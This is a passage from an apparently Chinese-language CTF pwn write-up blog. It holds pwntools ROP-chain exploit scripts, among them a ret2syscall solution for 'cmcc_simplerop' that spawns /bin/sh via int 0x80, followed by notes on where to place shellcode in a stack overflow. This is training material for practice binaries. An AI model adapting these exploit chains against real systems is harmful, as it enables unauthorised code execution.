<span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0807a66f</span>) <span class="comment"># inc eax ; ret</span></span><br><span class="line">	p += pack(<span class="string">&#x27;&lt;I&#x27;</span>, <span class="number">0x0806c943</span>) <span class="comment"># int 0x80</span></span><br><span class="line">        <span class="keyword">return</span> p</span><br><span class="line"></span><br><span class="line">shell = payload()</span><br><span class="line">r.sendline(shell)</span><br><span class="line">r.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h6 id="cmcc-simplerop"><a href="#cmcc-simplerop" class="headerlink" title="cmcc_simplerop"></a>cmcc_simplerop</h6><p>静态链接库，开了NX保护，没有后门函数，ret2sycall<img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240710205410404.png"  alt="image-20240710205410404"></p>
<p><img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240710205345881.png"  alt="image-20240710205345881"></p>
<p>用ROPgadget工具自动生成ropchain，需要修改长度</p>
<p>修改长度</p>
<p><img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240710212829884.png"  alt="image-20240710212829884"></p>
<p>修改完成之后写EXp</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">from struct import pack</span><br><span class="line">r=process(&#x27;./simplerop&#x27;)</span><br><span class="line"># Padding goes here</span><br><span class="line">def payload():</span><br><span class="line">    p = b&#x27;a&#x27;*(0x20)</span><br><span class="line">    p += pack(&#x27;&lt;I&#x27;, 0x0806e82a) # pop edx ; ret</span><br><span class="line">    p += pack(&#x27;&lt;I&#x27;, 0x080ea060) # @ .data</span><br><span class="line">    p += pack(&#x27;&lt;I&#x27;, 0x080bae06) # pop eax ; ret</span><br><span class="line">    p += b&#x27;/bin&#x27;</span><br><span class="line">    p += pack(&#x27;&lt;I&#x27;, 0x0809a15d) # mov dword ptr [edx], eax ; ret</span><br><span class="line">    p += pack(&#x27;&lt;I&#x27;, 0x0806e82a) # pop edx ; ret</span><br><span class="line">    p += pack(&#x27;&lt;I&#x27;, 0x080ea064) # @ .data + 4</span><br><span class="line">    p += pack(&#x27;&lt;I&#x27;, 0x080bae06) # pop eax ; ret</span><br><span class="line">    p += b&#x27;//sh&#x27;</span><br><span class="line">    p += pack(&#x27;&lt;I&#x27;, 0x0809a15d) # mov dword ptr [edx], eax ; ret</span><br><span class="line">    p += pack(&#x27;&lt;I&#x27;, 0x0806e850) # pop edx ; pop ecx ; pop ebx ; ret</span><br><span class="line">    p += p32(0)+p32(0)+p32(0x080ea060)</span><br><span class="line">    #p += pack(&#x27;&lt;I&#x27;, 0x080ea060) # padding without overwrite ebx</span><br><span class="line">    p += pack(&#x27;&lt;I&#x27;, 0x080bae06) # pop eax ; ret</span><br><span class="line">    p += p32(0xb)</span><br><span class="line">    p += pack(&#x27;&lt;I&#x27;, 0x080493e1) # int 0x80</span><br><span class="line">    return p</span><br><span class="line">shell = payload()</span><br><span class="line">r.sendline(shell)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="栈溢出利用"><a href="#栈溢出利用" class="headerlink" title="栈溢出利用"></a>栈溢出利用</h2><p>将shellcode放在缓冲区开头，通过覆盖返回地址跳转至shellcode（溢出字节有限制）</p>
<p><img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240709200423947.png"  alt="image-20240709200423947"></p>
<p>将shellcode放在返回地址之后，然后通过覆盖返回地址跳转shellcode（溢出字节无限制）</p>
<p><img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240709200529395.png"  alt="image-20240709200529395"></p>
<p>将shellcode放在返回地址之后，然后通过将返回地址跳转jmp esp，esp指向shellcode</p>
<p><img   src="C:\Users\86187\AppData\Roaming\Typora\typora-user-images\image-20240709201212844.png"  alt="image-20240709201212844"></p>

                    
                </div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                    </div>
                    <div>
                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2024/05/22/%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86%20/"
                                   title=""
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis"></span>
                                        <span class="post-nav-item">Prev posts</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="copyright-info info-item">
        &copy;&nbsp;<span>2020</span>&nbsp;-&nbsp;2024
        
            &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">Keep Team</a>
        
    </div>

    <div class="theme-info info-item">
        Powered by&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;&&nbsp;Theme&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
    </div>

    

    

    
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="post-tools-list border-box">
        <!-- PC encrypt again -->
        

        <!-- PC TOC show toggle -->
        

        <!-- PC go comment -->
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <!-- toggle mode -->
        
            <li class="tools-item tool-toggle-theme-mode flex-center">
                <i class="fas fa-moon"></i>
            </li>
        

        <!-- rss -->
        

        <!-- to bottom -->
        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    

    <!-- tablet toc -->
    
</main>





<!-- common js -->

<script src="/js/utils.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/toggle-theme.js"></script>

<script src="/js/code-block.js"></script>

<script src="/js/main.js"></script>

<script src="/js/libs/anime.min.js"></script>


<!-- local search -->


<!-- lazyload -->


<div class="">
    <!-- home page -->
    

    <!-- post page -->
    
        <!-- post-helper -->
        
<script src="/js/post/post-helper.js"></script>


        <!-- toc -->
        

        <!-- copyright-info -->
        

        <!-- share -->
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



</body>
</html>
